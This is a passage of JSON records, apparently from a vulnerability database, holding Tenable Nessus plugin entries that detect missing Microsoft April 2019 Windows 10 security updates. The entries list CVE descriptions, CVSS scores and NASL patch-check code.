GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493470: Windows 10 Version 1607 and Windows Server 2016 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_APR_4493470.NASL", "href": "https://www.tenable.com/plugins/nessus/123943", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123943);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2019-0685\",\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0739\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0806\",\n \"CVE-2019-0810\",\n \"CVE-2019-0812\",\n \"CVE-2019-0814\",\n \"CVE-2019-0829\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0860\",\n \"CVE-2019-0861\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493470\");\n script_xref(name:\"MSFT\", value:\"MS19-4493470\");\n\n script_name(english:\"KB4493470: Windows 10 Version 1607 and Windows Server 2016 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493470.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)\");\n # https://support.microsoft.com/en-us/help/4493470/windows-10-update-kb4493470\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2289eba9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4493470.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-04\";\nkbs = make_list('4493470');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date:\"04_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4493470])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T05:13:25", "description": "The remote Windows host is missing security update 4493474.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2019-0837)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-0802, CVE-2019-0849)\n\n - A remote code execution vulnerability exists when OLE\n automation improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could gain execution on the victim system.\n (CVE-2019-0794)\n\n - A remote code execution vulnerability exists when the\n IOleCvt interface renders ASP webpage content. An\n attacker who successfully exploited the vulnerability\n could run malicious code remotely to take control of the\n users system. (CVE-2019-0845)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-0853)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-0842)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-0739)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-0846, CVE-2019-0847, CVE-2019-0851,\n CVE-2019-0877, CVE-2019-0879)\n\n - An elevation of privilege vulnerability exists when the\n Windows Client Server Run-Time Subsystem (CSRSS) fails\n to properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0735)\n\n - An information disclosure vulnerability exists when\n Windows Task Scheduler improperly discloses credentials\n to Windows Credential Manager. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-0838)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-0685, CVE-2019-0803,\n CVE-2019-0859)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2019-0856)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0814, CVE-2019-0848)\n\n - An elevation of privilege vulnerability exists when\n Windows AppX Deployment Service (AppXSVC) improperly\n handles hard links. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-0841)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2019-0790,\n CVE-2019-0791, CVE-2019-0792, CVE-2019-0793,\n CVE-2019-0795)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2019-0806, CVE-2019-0810,\n CVE-2019-0812, CVE-2019-0829, CVE-2019-0860,\n CVE-2019-0861)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0835)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could set the short name of a file with a\n long name to an arbitrary short name, overriding the\n file system with limited privileges. (CVE-2019-0796)", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "KB4493474: Windows 10 Version 1703 April 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0853", "CVE-2019-0791", "CVE-2019-0845", "CVE-2019-0848", "CVE-2019-0732", "CVE-2019-0838", "CVE-2019-0792", "CVE-2019-0842", "CVE-2019-0844", "CVE-2019-0862", "CVE-2019-0796", "CVE-2019-0814", "CVE-2019-0812", "CVE-2019-0837", "CVE-2019-0810", "CVE-2019-0846", "CVE-2019-0861", "CVE-2019-0839", "CVE-2019-0752", "CVE-2019-0688", "CVE-2019-0847", "CVE-2019-0860", "CVE-2019-0806", "CVE-2019-0793", "CVE-2019-0790", "CVE-2019-0764", "CVE-2019-0841", "CVE-2019-0859", "CVE-2019-0753", "CVE-2019-0803", "CVE-2019-0739", "CVE-2019-0856", "CVE-2019-0685", "CVE-2019-0730", "CVE-2019-0735", "CVE-2019-0829", "CVE-2019-0877", "CVE-2019-0731", "CVE-2019-0802", "CVE-2019-0849", "CVE-2019-0836", "CVE-2019-0794", "CVE-2019-0879", "CVE-2019-0795", "CVE-2019-0851", "CVE-2019-0835", "CVE-2019-0805"], "modified": "2019-04-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS19_APR_4493474.NASL", "href": "https://www.tenable.com/plugins/nessus/123946", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123946);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2019-0685\",\n \"CVE-2019-0688\",\n \"CVE-2019-0730\",\n \"CVE-2019-0731\",\n \"CVE-2019-0732\",\n \"CVE-2019-0735\",\n \"CVE-2019-0739\",\n \"CVE-2019-0752\",\n \"CVE-2019-0753\",\n \"CVE-2019-0764\",\n \"CVE-2019-0790\",\n \"CVE-2019-0791\",\n \"CVE-2019-0792\",\n \"CVE-2019-0793\",\n \"CVE-2019-0794\",\n \"CVE-2019-0795\",\n \"CVE-2019-0796\",\n \"CVE-2019-0802\",\n \"CVE-2019-0803\",\n \"CVE-2019-0805\",\n \"CVE-2019-0806\",\n \"CVE-2019-0810\",\n \"CVE-2019-0812\",\n \"CVE-2019-0814\",\n \"CVE-2019-0829\",\n \"CVE-2019-0835\",\n \"CVE-2019-0836\",\n \"CVE-2019-0837\",\n \"CVE-2019-0838\",\n \"CVE-2019-0839\",\n \"CVE-2019-0841\",\n \"CVE-2019-0842\",\n \"CVE-2019-0844\",\n \"CVE-2019-0845\",\n \"CVE-2019-0846\",\n \"CVE-2019-0847\",\n \"CVE-2019-0848\",\n \"CVE-2019-0849\",\n \"CVE-2019-0851\",\n \"CVE-2019-0853\",\n \"CVE-2019-0856\",\n \"CVE-2019-0859\",\n \"CVE-2019-0860\",\n \"CVE-2019-0861\",\n \"CVE-2019-0862\",\n \"CVE-2019-0877\",\n \"CVE-2019-0879\"\n );\n script_xref(name:\"MSKB\", value:\"4493474\");\n script_xref(name:\"MSFT\", value:\"MS19-4493474\");\n\n script_name(english:\"KB4493474: Windows 10 Version 1703 April 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4493474.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in\n Windows which could allow an attacker to bypass Device\n Guard when Windows improperly handles calls to the LUAFV\n driver (luafv.sys). An attacker who successfully\n exploited this vulnerability could circumvent a User\n Mode Code Integrity (UMCI) policy on the machine.\n (CVE-2019-0732)\n\n - An information disclosure vulnerability exists when the\n Terminal Services component improperly discloses the\n contents of its memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise a users system. (CVE-2019-0839)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2019-0837)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-0688)\n\n - A tampering vulnerability exists when Microsoft browsers\n do not properly validate input under specific\n conditions. An attacker who exploited the vulnerability\n could pass custom command line parameters.\n (CVE-2019-0764)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to the LUAFV driver\n (luafv.sys). An attacker who successfully exploited this\n vulnerability could run arbitrary code in the security\n context of the local system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-0730, CVE-2019-0731, CVE-2019-0805,\n CVE-2019-0836)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-0752, CVE-2019-0753, CVE-2019-0862)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-0844)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted 